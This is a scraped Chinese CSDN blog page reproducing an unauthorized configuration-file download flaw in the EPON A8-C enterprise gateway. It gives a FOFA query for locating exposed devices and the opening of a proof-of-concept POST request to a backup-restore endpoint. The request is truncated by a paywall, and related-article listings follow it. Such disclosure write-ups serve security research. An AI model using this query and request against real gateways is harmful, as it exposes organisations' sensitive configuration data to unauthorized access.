【漏洞复现】EPON上行A8-C政企网关未授权下载漏洞

最新推荐文章于 2024-08-05 18:19:59 发布
最新推荐文章于 2024-08-05 18:19:59 发布
阅读量873 收藏 7
点赞数 11
文章标签: 网络 web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37113223/article/details/136035683
版权
【漏洞复现】 专栏收录该内容
150 篇文章 1 订阅

已下架不支持订阅

本文详细介绍了EPON上行A8-C政企网关的一个安全问题,该网关存在未授权下载配置文件的漏洞,允许攻击者在未经许可的情况下获取包含敏感信息的配置文件。通过fofa查询工具可以找到受影响的产品。为修复此漏洞,建议联系设备制造商进行处理。
摘要由CSDN通过智能技术生成

Nx01 产品简介

        EPON上行A8-C政企网关是一款终端产品,提供企业网络解决方案。

Nx02 漏洞描述

        EPON上行A8-C政企网关配置文件未授权下载漏洞,攻击者在未授权状态下下载配置文件,获取配置文件内敏感信息。

Nx03 产品主页

fofa-query: "ZXECS" && title=="Web user login"

Nx04 漏洞复现

POC:

POST /sys_manager/back_huifu_mod.php?index_name= HTTP/1.1
Host: {
  {Hostname}}
Content-Length: 29
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safa
了解本专栏 已下架不支持订阅
晚风不及你ღ
关注
专栏目录

已下架不支持订阅

漏洞复现EPON上行A8-C政企网关信息泄露漏洞
晚风不及你
02-05 979
EPON上行A8-C政企网关是一款终端产品,提供企业网络解决方案。
天翼宽带政企网关A8-CFTTO安装教程.docx
10-07
天翼宽带政企网关 A8-C(FTTO) 安装教程 一、登录界面介绍 在安装天翼宽带政企网关 A8-C(FTTO) 设备时,需要先在电脑上设置好 IP 地址和子网掩码,然后连接到设备的内网口,打开网页输入地址 192.168.1.1,回车,...
【已解决】天翼电信宽带改桥模式,使用路由器ppoe拨号
热门推荐
月球挖掘机
07-19 2万+
本教程将讲解如何将电信光猫宽带设置为桥模式,从而实现通过路由器拨号上网。
授权访问漏洞(及其修复方法)---看这一篇就够!!
最新发布
C233333235的博客
08-05 3394
Redis 默认情况下,会绑定在 0.0.0.0:6379 ,如果没有进⾏采⽤相关的策略,⽐如添加防 ⽕墙规则避免其他⾮信任来源 ip 访问等,这样将会将 Redis 服务暴露到公⽹上,如果在没有设 置密码认证(⼀般为空)的情况下,会导致任意⽤户在可以访问⽬标服务器的情况下授权Redis 以及读取 Redis 的数据。
授权下载导致的信息泄露
weixin_53884648的博客
04-18 483
常见漏洞发掘之授权访问、下载
居于U2000手机管理光猫,小区运营商FTTH光猫注册神器,MA5680T手机管理,自动添加光猫...
weixin_34092455的博客
09-16 1828
此软件居于U2000开发,需要U2000管理支持 主要功能: 光猫查看->上线情况、下线原因、下线时间、光猫重启、光模块发送功能、接收功能、温度 Radius诊断->用户基本信息、拨打电话、端口绑定情况、是否在线、当前端口、上线时间、终端信息 业务功能->光猫扫码注册(EPON扫描MAC地址,GPON扫描SN码)、下发LOID码注册方式、删除LOID、删除光猫、查看PON...
华为B610-4E光猫设置的问题
guoxizheng的博客
11-08 1万+
华为B610-4E光猫设置的问题
授权访问漏洞总结
LuckySec
03-24 5104
前言:这篇文章主要收集一些常见的授权访问漏洞授权访问漏洞可以理解为需要安全配置或权限认证的地址、授权页面存在缺陷导致其他用户可以直接访问从而引发重要权限可被操作、数据库或网站目录等敏感信息泄露。 0x01 授权漏洞预览 Active MQ 授权访问 Atlassian Crowd 授权访问 CouchDB 授权访问 Docker 授权访问 Dubbo 授权访问 Druid 授权访问 Elasticsearch 授权访问 FTP 授权访问 Hadoop 授权访问 JBoss 授权访
授权漏洞总结
weixin_45682070的博客
11-06 1188
前言 今年5月,比特币勒索病毒 WannaCry 席卷全球,国内众多机构部门计算机系统瘫痪。根据之前应急响应的案例分析,以及一些安全报告统计,目前大部分的勒索病毒均利用授权访问等通用漏洞进行植入、勒索,尤其是 Redis、MongoDB 等数据库的授权访问漏洞尤其严重。参见《【脉搏译文系列】如何高效的应对勒索软件》 0x01 介绍 授权访问可以理解为需要安全配置或权限认证的地址、授权页面存在缺陷,导致其他用户可以直接访问,从而引发重要权限可被操作、数据库、网站目录等敏感信息泄露。 目前主要存在授权.
天翼宽带政企网关A8_CFTTO安装教程.doc
09-24
天翼宽带政企网关A8-C(FTTO)安装教程 在本篇教程中,我们将详细介绍天翼宽带政企网关A8-C(FTTO)的安装过程。 一、登录界面介绍 在安装前,我们需要在电脑上设置好IP地址:192.168.1.2,子网掩码:255.255....
EPON命令行手册-V1.1.pdf
02-16
根据给定文件的内容,我们可以提炼出一系列与康特OLT(EPON)相关的配置和管理知识点。这些知识点涵盖了命令行手册的多个方面,包括设备连接、命令行基础、系统命令、板卡配置、配置文件、升级配置和告警配置等。 ...
中兴EPON-C300基本操作.pdf
04-05
《中兴EPON-C300基本操作》 中兴EPON-C300是一款用于光网络通信的设备,主要用于实现以太网无源光网络EPON)的接入服务。该设备的操作主要包括硬件观察、基本配置、清空配置、机架及单板配置以及网管配置等多个...
授权漏洞
Dasdwer的博客
03-24 7439
授权访问漏洞可以理解为需要安全配置或权限认证的地址、授权页面存在缺陷导致其他用户可以直接访问从而引发重要权限可被操作、数据库或网站目录等敏感信息泄露。
漏洞复现】斐讯FIR151M路由器授权下载漏洞
晚风不及你
02-07 678
斐讯数据通信技术有限公司成立于2009年,是为用户提供智慧家庭领域智能产品和云服务的科技创新性企业。
常见授权访问漏洞
weixin_60838266的博客
07-17 2169
由于框架对控制器名没有进行足够的检测,导致在没有开启强制路由的情况下可以执行任意方法,从而导致远程命令执行漏洞。受影响的版本包括 5.0 和 5.1 版本(即默认情况下)。
二十四种授权访问漏洞合集(三)
网安小白
08-05 1139
漏洞简述JBOSS 企业应用平台EAP是 J2EE 应用的中间件平台。默认情况下访问 http://ip:8080/jmx-console,就可以浏览 Jboss 的部署管理的信息不需要输入用户名和密码可以直接部署上传木马有安全隐患。LDAP中文全称为:轻型目录访问协议(Lightweight Directory Access Protocol),默认使用389, LDAP 底层一般使用 TCP 或 UDP 作为传输协议。目录服务是一个特殊的数据库,是一种以树状结构的目录数据库为基础。
授权访问:Rsync 授权访问漏洞
qq_68163788的博客
05-16 1028
Rsync(remote synchronize)是一个远程数据同步工具,可通过 LAN/WAN 快速同步多台主机间的文件,也可以同步本地硬盘中的不同目录。 Rsync 默认允许匿名访问,如果在配置文件中没有相关的用户认证以及文件授权,就会触发隐患。Rsync 的默认端口为 837。
授权访问漏洞
C233333235的博客
08-04 1034
Redis 默认情况下,会绑定在,如果没有进⾏采⽤相关的策略,⽐如添加防 ⽕墙规则避免其他⾮信任来源 ip 访问等,这样将会将 Redis 服务暴露到公⽹上,如果在没有设 置密码认证(⼀般为空)的情况下,会导致任意⽤户在可以访问⽬标服务器的情况下授权Redis 以及读取 Redis 的数据。攻击者在授权访问 Redis 的情况下,利⽤ Redis ⾃身的提供的config 命令,可以进⾏写⽂件操作,攻击者可以成功将⾃⼰的ssh公钥写⼊⽬标服务器的/root/.ssh ⽂件夹的。
中国电信EPON上行e8-C终端技术规范详解
"该文档是关于中国电信EPON上行e8-C终端的技术规范书,涵盖了设备类型、物理接口、功能需求、安全措施、管理和维护等多个方面,旨在定义和规范EPON上行e8-C终端的设计与实现标准。" 本文档详细阐述了中国电信对于...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值